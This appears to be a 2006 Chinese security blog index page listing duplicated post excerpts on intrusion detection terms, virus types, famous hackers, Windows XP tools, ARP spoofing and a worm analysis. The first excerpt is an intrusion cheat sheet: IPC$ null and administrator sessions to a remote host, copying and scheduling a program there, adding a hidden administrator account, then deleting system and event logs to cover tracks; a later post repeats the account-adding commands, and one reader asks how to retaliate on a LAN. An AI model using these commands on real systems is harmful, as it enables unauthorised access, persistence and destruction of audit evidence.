HACK&网络安全
〖摘要:〗
(与远程主机建立空管连接) net use IP地址ipc$ "" /use:""
(以管理员身份登录远程主机) net use IP地址ipc$ "密码" /use:"Administrator"
(传送文件到远程主机WINNT目录下)copy 本机目录路径程序 IP地址admin$
(查看远程主机时间) net time IP地址
(定时启动某个程序) at IP地址 02:18 readme.exe
(查看共享) net view IP地址
(查看netbios工作组列表) nbtstat -A IP地址
(将远程主机C盘映射为自己的F盘) net use f: IP地址c$ ""/user:"Administrator"
(这两条把自己增加到管理员组): net user 用户名 密码 /add
net localgroup Administrators 用户名 /add
(断开连接) net use IP地址ipc$ /delete
扫尾:
del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dtclog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log
继续阅读其余的 3156 字
(与远程主机建立空管连接) net use IP地址ipc$ "" /use:""
(以管理员身份登录远程主机) net use IP地址ipc$ "密码" /use:"Administrator"
(传送文件到远程主机WINNT目录下)copy 本机目录路径程序 IP地址admin$
(查看远程主机时间) net time IP地址
(定时启动某个程序) at IP地址 02:18 readme.exe
(查看共享) net view IP地址
(查看netbios工作组列表) nbtstat -A IP地址
(将远程主机C盘映射为自己的F盘) net use f: IP地址c$ ""/user:"Administrator"
(这两条把自己增加到管理员组): net user 用户名 密码 /add
net localgroup Administrators 用户名 /add
(断开连接) net use IP地址ipc$ /delete
扫尾:
del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dtclog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log
继续阅读其余的 3156 字
weiking
2006-04-24 13:14:10
阅读:736
评论:0
引用:0
〖摘要:〗
ArachNIDS是由Max Visi开发的一个攻击特征数据库,它是动态更新的,适用于多种基于网络的入侵检测系统.
CIDF(Common Intrusion Detection Framework;通用入侵检测框架) CIDF力图在某种程度上将入侵检测标准化,开发一些协议和应用程序接口,以使入侵检测的研究项目之间能够共享信息和资源,并且入侵检测组件也能够在其它系统中再利用。
(Common Intrusion Specification Language,通用入侵规范语言) CISL是CIDF组件间彼此通信的语言。由于CIDF就是对协议和接口标准化的尝试,因此CISL就是对入侵检测研究的语言进行标准化的尝试。
DoS和DDoS分别代表的是"拒绝服务"和"分布式拒绝服务"。拒绝服务攻击专门设计用来阻止授权用户对系统以及系统数据进行访问,通常采用的攻击方式是让系统服务器超载或者让系统死机。DoS攻击可能涉及到通过国际互联网发送大量的错误网络信息包。如果DoS攻击来源于单点进攻,那么可以采用简单的交通控制系统来探测到电脑黑客。较为复杂的DoS攻击可以包含多种结构和大量的攻击点。电脑黑客经常操纵其它计算机和网络服务器并且使用它们的地址进行DoS攻击,这样就可以掩盖他们自己的真实身份。
继续阅读其余的 488 字
ArachNIDS是由Max Visi开发的一个攻击特征数据库,它是动态更新的,适用于多种基于网络的入侵检测系统.
CIDF(Common Intrusion Detection Framework;通用入侵检测框架) CIDF力图在某种程度上将入侵检测标准化,开发一些协议和应用程序接口,以使入侵检测的研究项目之间能够共享信息和资源,并且入侵检测组件也能够在其它系统中再利用。
(Common Intrusion Specification Language,通用入侵规范语言) CISL是CIDF组件间彼此通信的语言。由于CIDF就是对协议和接口标准化的尝试,因此CISL就是对入侵检测研究的语言进行标准化的尝试。
DoS和DDoS分别代表的是"拒绝服务"和"分布式拒绝服务"。拒绝服务攻击专门设计用来阻止授权用户对系统以及系统数据进行访问,通常采用的攻击方式是让系统服务器超载或者让系统死机。DoS攻击可能涉及到通过国际互联网发送大量的错误网络信息包。如果DoS攻击来源于单点进攻,那么可以采用简单的交通控制系统来探测到电脑黑客。较为复杂的DoS攻击可以包含多种结构和大量的攻击点。电脑黑客经常操纵其它计算机和网络服务器并且使用它们的地址进行DoS攻击,这样就可以掩盖他们自己的真实身份。
继续阅读其余的 488 字
weiking
2006-04-20 00:32:04
阅读:363
评论:1
引用:0
〖摘要:〗
DOS病毒:
指针对DOS操作系统开发的病毒。目前几乎没有新制作的DOS病毒,由于Win9x病 毒的出现,DOS病毒几乎绝迹。但DOS病毒在Win9x环境中仍可以进行感染活动,因此若执行染毒文件,Win9x用户也 会被感染。我们使用的杀毒软件能够查杀的病毒中一半以上都是DOS病毒,可见DOS时代DOS病毒的泛滥程度。但这些 众多的病毒中除了少数几个让用户胆战心惊的病毒之外,大部分病毒都只是制作者出于好奇或对公开代码进行一定变 形而制作的病毒。
Windows病毒:
主要指针对Win9x操作系统的病毒。现在的电脑用户一般都安装Windows系统 Windows病毒一般感染Win9x系统,其中最典型的病毒有CIH病毒。但这并不意味着可以忽略系统是WinNT系列包括 Win2000 的计算机。一些Windows病毒不仅在Win9x上正常感染,还可以感染WinNT上的其它文件。主要感染的文 件扩展名为EXESCRDLLOCX等。
继续阅读其余的 404 字
DOS病毒:
指针对DOS操作系统开发的病毒。目前几乎没有新制作的DOS病毒,由于Win9x病 毒的出现,DOS病毒几乎绝迹。但DOS病毒在Win9x环境中仍可以进行感染活动,因此若执行染毒文件,Win9x用户也 会被感染。我们使用的杀毒软件能够查杀的病毒中一半以上都是DOS病毒,可见DOS时代DOS病毒的泛滥程度。但这些 众多的病毒中除了少数几个让用户胆战心惊的病毒之外,大部分病毒都只是制作者出于好奇或对公开代码进行一定变 形而制作的病毒。
Windows病毒:
主要指针对Win9x操作系统的病毒。现在的电脑用户一般都安装Windows系统 Windows病毒一般感染Win9x系统,其中最典型的病毒有CIH病毒。但这并不意味着可以忽略系统是WinNT系列包括 Win2000 的计算机。一些Windows病毒不仅在Win9x上正常感染,还可以感染WinNT上的其它文件。主要感染的文 件扩展名为EXESCRDLLOCX等。
继续阅读其余的 404 字
weiking
2006-03-29 02:19:47
阅读:624
评论:0
引用:0
〖摘要:〗
如今,黑客的形象已经十分暧昧,英雄和罪犯、正义与邪恶,美好和丑陋,高尚和卑劣,在黑客这个词语下,居然是如此的泾渭不分明!因为黑客有着高贵和高品质的传统。
今天我们选择的IT历史上的十大老牌黑客,可以让我们更真切地了解黑客复杂的内涵。黑客曾是一种荣耀,一种美好的传统。它代表着反权威却奉公守法的计算机英雄。这群电气工程师和计算机革新者,才华横溢,行为孤僻,也有个性缺陷。他们沉湎于技术和计算机,视工作为一种艺术。他们不仅仅是计算机革命的重要参与者,而根本就是计算机革命的主角和英雄(这两个词英文就是同一个词:Heros)。当然,也不发臭名昭著的犯罪。他们代表着黑客的传统,属于老牌黑客。
继续阅读其余的 4002 字
如今,黑客的形象已经十分暧昧,英雄和罪犯、正义与邪恶,美好和丑陋,高尚和卑劣,在黑客这个词语下,居然是如此的泾渭不分明!因为黑客有着高贵和高品质的传统。
今天我们选择的IT历史上的十大老牌黑客,可以让我们更真切地了解黑客复杂的内涵。黑客曾是一种荣耀,一种美好的传统。它代表着反权威却奉公守法的计算机英雄。这群电气工程师和计算机革新者,才华横溢,行为孤僻,也有个性缺陷。他们沉湎于技术和计算机,视工作为一种艺术。他们不仅仅是计算机革命的重要参与者,而根本就是计算机革命的主角和英雄(这两个词英文就是同一个词:Heros)。当然,也不发臭名昭著的犯罪。他们代表着黑客的传统,属于老牌黑客。
继续阅读其余的 4002 字
weiking
2006-03-23 19:11:24
阅读:694
评论:2
引用:0
〖摘要:〗
Windows XP现在大家都在用了,不过,隐藏在它其中的秘密武器可不是人人都找得到,下面就让我们一起来寻找Win XP中的28个秘密武器。
1、免费的系统教程(system32文件夹下)
安装完windows xp后很想马上学习并体验一下它的魅力吗?我们无需再东奔西走去找烦人的文字教材。只要选择“开始”→“漫游windows xp”,就会出现界面,它将引导我们游历windows xp的新功能。
小提示:windows xp中自带的教程非常形象,是图形界面的,而且制作得相当精美,微软的权威性可想而知。如果你的“开始”菜单上没有“漫游windows xp”项目,则可以运行c:\windows\system32\tourstart.exe进入。
2、辅助功能向导——Accwiz(system32文件夹下)
我们知道,微软在windows中为残疾人士提供了辅助功能,使他们也能操作计算机。该程序可以根据用户的视觉、听力和行动来配置我们的windows,使残疾人士能根据自身情况更好地使用windows。
3、字符映射表——Charmap(system32文件夹)
是不是觉得word的“插入符号”功能非常方便?我们在其他windows程序中也常常要插入一些特殊符号,而一个个地找又麻烦,这时可使用“字符映射表”程序帮忙。通过“字符映射表”可查看选定字体中有哪些字符,选中后单击“选定”和“复制”按钮,即可把选定字符复制到windows剪贴板中,供字处理软件粘贴使用。
小提示:用它来复制特殊字体中的特殊符号特别有用。
继续阅读其余的 10540 字
Windows XP现在大家都在用了,不过,隐藏在它其中的秘密武器可不是人人都找得到,下面就让我们一起来寻找Win XP中的28个秘密武器。
1、免费的系统教程(system32文件夹下)
安装完windows xp后很想马上学习并体验一下它的魅力吗?我们无需再东奔西走去找烦人的文字教材。只要选择“开始”→“漫游windows xp”,就会出现界面,它将引导我们游历windows xp的新功能。
小提示:windows xp中自带的教程非常形象,是图形界面的,而且制作得相当精美,微软的权威性可想而知。如果你的“开始”菜单上没有“漫游windows xp”项目,则可以运行c:\windows\system32\tourstart.exe进入。
2、辅助功能向导——Accwiz(system32文件夹下)
我们知道,微软在windows中为残疾人士提供了辅助功能,使他们也能操作计算机。该程序可以根据用户的视觉、听力和行动来配置我们的windows,使残疾人士能根据自身情况更好地使用windows。
3、字符映射表——Charmap(system32文件夹)
是不是觉得word的“插入符号”功能非常方便?我们在其他windows程序中也常常要插入一些特殊符号,而一个个地找又麻烦,这时可使用“字符映射表”程序帮忙。通过“字符映射表”可查看选定字体中有哪些字符,选中后单击“选定”和“复制”按钮,即可把选定字符复制到windows剪贴板中,供字处理软件粘贴使用。
小提示:用它来复制特殊字体中的特殊符号特别有用。
继续阅读其余的 10540 字
weiking
2006-03-18 01:33:46
阅读:475
评论:0
引用:0
〖摘要:〗
NBTscan version 1.5.1. Copyright (C) 1999-2003 Alla Bezroutchko.
This is a free software and it comes with absolutely no warranty.
You can use, distribute and modify it under terms of GNU GPL.
继续阅读其余的 6476 字
NBTscan version 1.5.1. Copyright (C) 1999-2003 Alla Bezroutchko.
This is a free software and it comes with absolutely no warranty.
You can use, distribute and modify it under terms of GNU GPL.
继续阅读其余的 6476 字
weiking
2006-03-18 01:23:44
阅读:937
评论:0
引用:0
〖摘要:〗
在局域网中,通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞。
ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。
继续阅读其余的 4658 字
在局域网中,通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞。
ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。
继续阅读其余的 4658 字
weiking
2006-03-05 23:06:01
阅读:401
评论:0
引用:0
气愤,如果早知道会这样,当初就学网络了!
一个小小的巨域网,就是有人玩狠的,总被欺负啊..
谁能教教我?
weiking
2006-03-05 22:22:54
阅读:611
评论:4
引用:0
〖摘要:〗
[病毒名]:I-Worm.Wukill
[破坏方法]:这个病毒采用文件夹图标,具有很大迷惑性。该病毒运行后,会将自己大量复制到其他目录中。
一、 病毒首次运行时将显示"This File Has Been Damage!";
二、 将自己复制到windows目录下并改名
为Mstray.exe;
三、 修改注册表: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以达到其自启动的目的;
继续阅读其余的 872 字
[病毒名]:I-Worm.Wukill
[破坏方法]:这个病毒采用文件夹图标,具有很大迷惑性。该病毒运行后,会将自己大量复制到其他目录中。
一、 病毒首次运行时将显示"This File Has Been Damage!";
二、 将自己复制到windows目录下并改名
为Mstray.exe;
三、 修改注册表: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以达到其自启动的目的;
继续阅读其余的 872 字
weiking
2006-03-04 13:32:27
阅读:487
评论:0
引用:0
摘自:华夏黑客同盟
query user 查询登陆用户
logoff ID 蹬出某用户
net user 查看所有用户
net user tty310 1506414 /add 添加一个用户,用户名tty310 密码1506414
net localgroup administrators tty310 /add 把tty310这个用户加到管理员组
net user tty310 查看用户tty310的情况
net user tty310 82073 将用户tty310的密码更改为82073
net user tty310 /delete 删除tty310
net user tty310 /active:no 禁用该用户
net user tty310 /active:yes 启用该用户
query user 查询登陆用户
logoff ID 蹬出某用户
net user 查看所有用户
net user tty310 1506414 /add 添加一个用户,用户名tty310 密码1506414
net localgroup administrators tty310 /add 把tty310这个用户加到管理员组
net user tty310 查看用户tty310的情况
net user tty310 82073 将用户tty310的密码更改为82073
net user tty310 /delete 删除tty310
net user tty310 /active:no 禁用该用户
net user tty310 /active:yes 启用该用户
weiking
2006-02-25 09:23:26
阅读:298
评论:0
引用:0